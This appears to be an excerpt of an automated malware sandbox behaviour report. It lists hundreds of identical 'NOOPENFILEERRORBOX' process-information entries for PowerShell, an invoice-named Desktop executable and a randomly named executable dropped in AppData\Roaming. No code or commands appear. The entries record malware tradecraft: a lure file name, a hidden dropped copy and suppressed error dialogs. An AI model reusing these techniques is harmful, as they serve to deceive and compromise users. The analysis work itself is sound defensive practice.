Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process information set: NOOPENFILEERRORBOX
